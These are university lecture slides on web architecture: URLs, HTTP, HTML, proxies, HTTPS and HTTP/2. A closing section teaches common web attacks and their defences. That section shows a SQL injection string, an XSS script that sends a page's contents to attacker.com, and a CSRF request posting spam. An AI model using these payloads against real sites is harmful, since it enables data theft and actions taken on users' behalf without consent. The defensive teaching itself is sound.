Web Fundamentals
Web Architecture & Technologies

Ruben Verborgh, Ghent Universityimec

Web Fundamentals
Web Architecture & Technologies

#WebDev2017

Ruben Verborgh

Ghent University imec IDLab

Creative Commons License Except where otherwise noted, the content of these slides is licensed under a Creative Commons Attribution 4.0 International License.

The Web seems an “evident” extension
of the Internet.

What is so special about
the invention of the Web?

This flyer predates the Web’s boom.
What is missing?

[A flyer with instructions on how to obtain files through a mailserver and FTP server.]

The Web actually consists of
3 separate—but connected—inventions.

a circle diagram connecting URL, HTTP, and HTML

The Web actually consists of
3 separate—but connected—inventions.

Web Fundamentals
Web Architecture & Technologies

#WebDev2017

Web Fundamentals
Web Architecture & Technologies

#WebDev2017

A Web URL uniquely identifies and locates a resource anywhere in the universe.

A (well-chosen) URL combines
identification and location.

http://en.wikipedia.org/wiki/Marissa_Mayer

Deceptively simple, the URL is probably the most revolutionary part of the Web.

The generic URL syntax
extends beyond the Web.

<scheme>:<scheme-specific-part>

The uniform structure of an HTTP URL
includes the following parts.

http://<host>/<path>?<search>#<fragment>

hostname
identifies the machine
path
identifies the resource within the machine
search
optionally refines the resource
fragment
optionally identifies a part of the resource

The uniform structure of an HTTP URL
includes the following parts.

http://en.wikipedia.org/wiki/Marissa_Mayer#Career

hostname
the machine is en.wikipedia.org
path
the resource is /wiki/Marissa_Mayer
search
not present
fragment
the part of the resource is Career

An HTTP URL provides the instructions
to obtain a representation of the resource.

http://<host>/<path>?<search>#<fragment>

An HTTP URL provides the instructions
to obtain a representation of the resource.

http://en.wikipedia.org/wiki/Marissa_Mayer#Career

  1. The client looks up the IP address of en.wikipedia.org.
    • This address is 91.198.174.192.
  2. The client requests /wiki/Marissa_Mayer.
    • The server generates the corresponding Wikipedia article.
  3. The client finds #Career.
    • This corresponds to a header in the HTML document.

The URL became part of a family
of technologies related to identification.

The broadest family is IRI,
which supports non-ASCII characters.

Web Fundamentals
Web Architecture & Technologies

#WebDev2017

HTTP is a protocol to transfer representations from a server to a client.

After resolving the server’s IP address,
the client can send an HTTP request.

After resolving the server’s IP address,
the client can send an HTTP request.

To obtain http://en.wikipedia.org/wiki/Marissa_Mayer, the client connects to 91.198.174.192 on TCP port 80, and sends this request:

GET /wiki/Marissa_Mayer HTTP/1.1
Host: en.wikipedia.org
User-Agent: MyBrowser/1.0
Accept: text/html

HTTP has a limited number of methods.
The following 5 are widely known.

GET
transfer a representation
HEAD
transfer only status and headers
POST
perform a resource-specific operation
PUT
replace all representations
DELETE
remove all representations

An HTTP method is safe
if it is read-only.

An HTTP method is idempotent
if repetitions don’t alter the outcome.

Clients send the hostname,
so one server can host multiple websites.

When a server receives a request,
it generates a response.

When a server receives a request,
it generates a response.

In response to our previous request:

HTTP/1.1 200 OK
Date: Wed, 18 Feb 2016 09:30:46 GMT
Content-Type: text/html; charset=UTF-8
Last-Modified: Sun, 24 Jan 2016 18:26:27 GMT

<!DOCTYPE html>
<html lang="en" dir="ltr" class="client-nojs">
…

HTTP has 5 categories of status codes
to indicate how the request was handled.

100–199
info – the client may continue
200–299
success – request understood & accepted
300–399
redirection – further action is needed
400–499
client error – the request cannot be fulfilled
500–599
server error – the server failed to fulfill

A couple of these status codes
are very commonly encountered.

200
OK (“default”)
301
Moved Permanently
404
Not Found
500
Internal Server Error

HTTP has 5 categories of status codes
to indicate how the request was handled.

HTTP status ranges in a nutshell: 1xx: hold on 2xx: here you go 3xx: go away 4xx: you fucked up 5xx: I fucked up

Steve Losh August 28, 2013

Web Fundamentals
Web Architecture & Technologies

#WebDev2017

HTML is a markup language that
captures the structure of documents.

An element consists of its tags, attributes, and child nodes (elements and/or text).

This is a fragment of an HTML document.

<main>
  <h1>This is a title.</h1>
  <p id="introduction" class="summary">
    This is a paragraph<br/>
    with <em>emphasized</em> words.
  </p>
  <img src="image.jpg" alt="an image" />
</main>

The HTML specification restricts
what elements can be used and where.

HTML documents can contain hyperlinks
and other hypermedia controls.

HTML documents can embed or use
other media documents.

HTML is intended for markup,
not for makeup.

Web Fundamentals
Web Architecture & Technologies

#WebDev2017

The Web supports an immense variety
of different clients.

All clients need to support
a couple of core technologies.

Browsers offer an interactive environment
for general-purpose website consumption.

Web applications perform HTTP requests
using browser scripting functionality.

Desktop and mobile applications
can similarly create HTTP requests.

Crawlers process and/or index webpages,
and follow links to others.

Web Fundamentals
Web Architecture & Technologies

#WebDev2017

The HTTP protocol does not attach
meaning to URL paths and query strings.

Even though you might attach meaning to an URL like
http://example.org/products/guitars.html?brand=gibson,
such an interpretation is not specified.

In particular, slashes do not necessarily indicate folders;
a dot does not necessarily signal an extension.

The server might just have used this URL instead:
http://example.org/products-guitars?html%2Fbrand.gibson
and it might very well point to an image.

Web servers exist in many kinds and
have many possible implementations.

A static file server maps HTTP URLs
to internal file URLs.

An application server uses server-side code
to generate pages on demand.

Web Fundamentals
Web Architecture & Technologies

#WebDev2017

Several intermediaries may exist
between a client and a server.

Diagram showing a client connected to a server through several intermediaries.

In contrast to many other protocols,
HTTP enables transparent intermediaries.

This is not as easy with other protocols.
For example, let’s assume Java RMI.

removeObject.getMessage(234);
removeObject.getMessage(234);
removeObject.deleteMessage(234);

If a proxy server is inserted before the remote server,
may it cache the result of getMessage? If so, how long?

HTTP can be transparent because of
its standardized uniform interface.

The standardized method semantics
are crucial to make caching work.

Intermediaries can play different roles
in an HTTP interaction.

caching
to improve performance and availability
security
to handle authorization and authentication
routing
to redirect toward the right server
load balancing
to distribute load over servers
anonymizing
to bypass identification or logging

Depending on their position the network,
proxies are forward or reverse.

A device can listen on only one TCP port 80.
A reverse proxy lets it run many servers.

The proxy interfaces with app servers
through other, non-public TCP ports.

Caching can happen virtually anywhere—
and we don’t always know.

Diagram showing a client connected to a server through several intermediaries.

The notion of “client” and “server”
is relative to the interaction.

Diagram showing an intermediary in the role of both client and server.

Web Fundamentals
Web Architecture & Technologies

#WebDev2017

HTTP nodes send plaintext over TCP,
which means intermediaries can read it.

The Web needs to be a safe
and trusted environment for all.

HTTPS is a secure extension
of the HTTP protocol.

HTTPS can be applied in
different parts of the network.

Consider the common use case in which
an application server lives behind a reverse proxy.

Setting up HTTPS involves requesting,
installing, and maintaining a certificate.

HTTPS URLs are different,
so clients know what protocol to use.

Informing users about security in the UI
is an important part of a safer Web.

Most browsers indicate HTTPS in the address bar.

[“Secure” indication in the address bar]

Some browsers such as Chrome
campaign for an all-HTTPS Web.

[current treatment of regular HTTP pages in Chrome] [future treatment of regular HTTP pages in Chrome]

Web Fundamentals
Web Architecture & Technologies

#WebDev2017

The Web has been pushing HTTP’s limits,
so an update was due.

This section is based on http2 explained
by Daniel Stenberg, creator of curl.

Webpages consist of more and more items
that increasingly become larger.

Several limitations of HTTP have
a negative impact on page load times.

Many websites use(d) workarounds
to circumvent HTTP’s limitations.

inlining
Embed scripts, images, and/or styles inside HTML documents instead of linking them to reduce the number of items.
concatenation
Combine several scripts, images, or styles into a single file.
sharding
Distribute resources across different domains to bypass connection restrictions.

HTTP/2 set out a couple of
important goals for improvement.

HTTP/2 is a binary protocol that sends
frames over multiplexed streams.

HTTP/2 always goes over TLS in practice,
even though the standard also allows TCP.

Web Fundamentals
Web Architecture & Technologies

#WebDev2017

Protocol-level security is insufficient
to provide application-level security.

We will examine 3 common attack types
and how to defend against them.

code injection
executing malicious scripts on the server
cross-site scripting
executing malicious scripts on the client
cross-origin access
accessing information from other websites

With code injection, clients send input
designed to execute on the server.

attack
executable code passed in an URL or POST body parameter
cause
improper input validation by the server
defense
never trust raw client input
validate input ranges
escape values before passing to scripts

SQL injection used to be
a very common type of attack.

Server-side code

query = "SELECT id FROM User WHERE name='" + name + "' +
        " AND password='" + password + "'";

Client-side code

Result

SELECT id FROM User WHERE name='admin'
                    AND password='' OR ''='';

Client-side validation only offers usability;
servers always need to (re-)validate.

Client-side form

Ways to bypass

Client-side-only validation in the real world

With Cross-Site Scripting (XSS), a client-side script steals information from a webpage.

attack
trick another site into executing code in its own space, exposing or changing user data
causes
improper input validation
trusting third-party content
social engineering
defense
validate input
add token field on forms

Injecting JavaScript in pages
can steal a user’s personal data.

Original page echoes assets in contents

https://mybank.com/onlinebanking/?search=assets

Attack code

(xhr = new XMLHttpRequest()).open('GET',
  'http://attacker.com/?data=' + document.body.innerHTML);
xhr.send(null);

Modified URL echoes the attack code in contents

https://mybank.com/onlinebanking/?search=%3Cscript%3E(xhr%20%3D%20new

Submitting a form to another site
can execute actions on a user's behalf.

Attack code placed on third-party website

(xhr = new XMLHttpRequest()).open('POST',
  'http://reddit.com/?message=Cheap%20Pills%20For%20Sale');
xhr.send(null);

Cross-Site Request Forgery (CSRF) Prevention

<input name="csrf" type="hidden" value="XVduuls7" />
<input name="message" type="text"/>

With cross-origin access, a page requests third-party resources through JavaScript.

attack
request resources from another site with JavaScript and read their contents
causes
the existence of XMLHttpRequest
being logged in on another website
defense
browsers block cross-origin requests by default

Cross-origin requests are a problem
within browsers only.

Cross-Origin Resource Sharing (CORS) enables others to access your pages.

Web Fundamentals
Web Architecture & Technologies

#WebDev2017

Users spend most of their time on other sites.

This means that users prefer your site to work the same way as all the other sites they already know.

Jakob Nielsen